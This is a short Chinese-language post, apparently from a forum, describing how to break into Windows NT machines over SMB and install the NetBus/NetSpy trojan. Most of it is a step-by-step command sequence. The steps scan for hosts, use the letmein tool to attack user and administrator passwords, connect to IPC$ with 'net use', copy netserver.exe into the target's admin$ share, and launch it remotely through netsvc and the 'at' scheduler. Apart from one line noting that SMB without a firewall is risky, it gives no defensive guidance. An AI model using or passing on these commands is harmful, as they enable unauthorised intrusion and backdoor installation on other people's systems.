看了篇文章介绍使用netbus 或 netspy　远程入侵nt系统，感觉真是。。看来nt系统的共享机制如果不配合火墙使用，SMB会给你造成很大麻烦。。　连小小 只的木马都可以让nt管理员头大。 

    其攻击过程如下：

    1、使用扫描工具查找NT主机　　
　　　　 
    2 、确定攻击目标后，使用letmein 对目标主机进行攻击， 如： 
    letmein file://x.x.x.x/ -all -g mypwd (对\\x.x.x.x上所有用户攻击) 
    letmein file://x.x.x.x/ -admin -g mypwd (对\\x.x.x.x上管理员攻击) 
    letmein file://x.x.x.x/ -all -d mypwd (显示\\x.x.x.x上所有用户)     
    注：- 确定目标后，收集目标信息并尝试取得非法资源 

    3、当letmein 获取相关管理员权限后，使用ms提供的合法命令： 
    net use \\x.x.x.x\ipc$ "pass"/user:"user" 连接远程资源并将木马拷入远程 
    copy x:\netserver.exe \\x.x.x.x\admin$\system32 

    4、使用合法ms命令远程启动木马服务： 
    netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg